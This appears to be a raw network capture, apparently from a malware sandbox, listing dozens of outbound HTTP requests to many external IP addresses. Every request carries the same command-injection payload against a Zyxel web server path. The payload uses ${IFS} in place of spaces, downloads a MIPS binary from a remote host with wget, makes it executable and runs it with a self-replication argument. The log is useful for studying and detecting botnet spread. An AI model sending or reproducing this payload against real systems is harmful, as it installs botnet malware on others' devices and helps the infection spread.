                                                        Feb 2, 2024 06:20:18.435508013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        74192.168.2.1455226119.162.228.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435542107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        75192.168.2.1439184119.193.46.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435646057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        76192.168.2.1434876107.75.2.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435677052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        77192.168.2.1448206150.105.88.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435710907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        78192.168.2.1444242196.234.86.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435755968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        79192.168.2.1440238203.212.124.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435798883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        80192.168.2.1435130101.0.244.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435836077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        81192.168.2.1459016209.45.20.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435847998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        82192.168.2.143529483.67.42.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435934067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        83192.168.2.1457910190.255.232.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.435978889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        84192.168.2.14432041.238.208.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436007023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        85192.168.2.1439530190.68.103.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436054945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        86192.168.2.145939871.88.191.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436104059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        87192.168.2.1441860204.153.50.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436139107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        88192.168.2.145670636.173.142.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436162949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        89192.168.2.144882681.52.218.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436244011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        90192.168.2.1454926142.23.35.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436258078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        91192.168.2.1440160144.150.92.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436312914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        92192.168.2.1456072161.119.15.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436469078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        93192.168.2.143967667.139.17.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436469078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        94192.168.2.143401459.90.123.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436469078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        95192.168.2.144642843.23.60.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436500072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        96192.168.2.1444518171.179.150.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436552048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        97192.168.2.145723694.40.146.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436573982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        98192.168.2.1456806124.126.211.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436755896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        99192.168.2.1445046180.37.163.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436798096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        100192.168.2.145401437.255.152.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436834097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        101192.168.2.143532039.176.119.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436872959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        102192.168.2.145786448.184.198.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436919928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        103192.168.2.1458916192.72.220.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436956882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        104192.168.2.1454606183.199.72.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.436986923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        105192.168.2.1457346155.18.173.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437040091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        106192.168.2.1453626109.175.79.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437068939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        107192.168.2.1450640129.92.47.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437096119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        108192.168.2.145644625.47.1.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437160969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        109192.168.2.144715024.75.201.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437222004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        110192.168.2.1450954198.131.115.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437263966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        111192.168.2.144395267.240.210.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437319994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        112192.168.2.146054867.91.62.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437376022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        113192.168.2.1451480205.77.152.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437429905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        114192.168.2.1440776125.175.244.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437478065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        115192.168.2.1450772217.57.94.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437539101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        116192.168.2.1459688139.198.70.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437551975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        117192.168.2.1452560146.67.172.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437593937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        118192.168.2.1450754222.183.170.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437614918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        119192.168.2.1455352118.60.241.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437695026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        120192.168.2.143892231.206.67.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437752962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        121192.168.2.145608464.4.253.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437805891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        122192.168.2.1451082153.136.172.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437844992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        123192.168.2.1436678212.215.107.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437880039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        124192.168.2.1437776108.235.240.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437922001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        125192.168.2.144904877.246.161.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.437952042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        126192.168.2.1460054181.45.142.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438028097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        127192.168.2.144154244.169.191.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438069105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        128192.168.2.143924883.247.96.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438087940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        129192.168.2.14412801.23.114.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438147068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        130192.168.2.145322884.124.230.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438182116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        131192.168.2.1453402102.138.129.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438251019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        132192.168.2.1456912178.35.223.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438288927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        133192.168.2.144604891.5.82.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438317060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        134192.168.2.1446252122.17.188.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438374996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        135192.168.2.145078646.52.194.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.438419104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        136192.168.2.144561480.76.107.4443
                                                        TimestampBytes transferredDirectionData
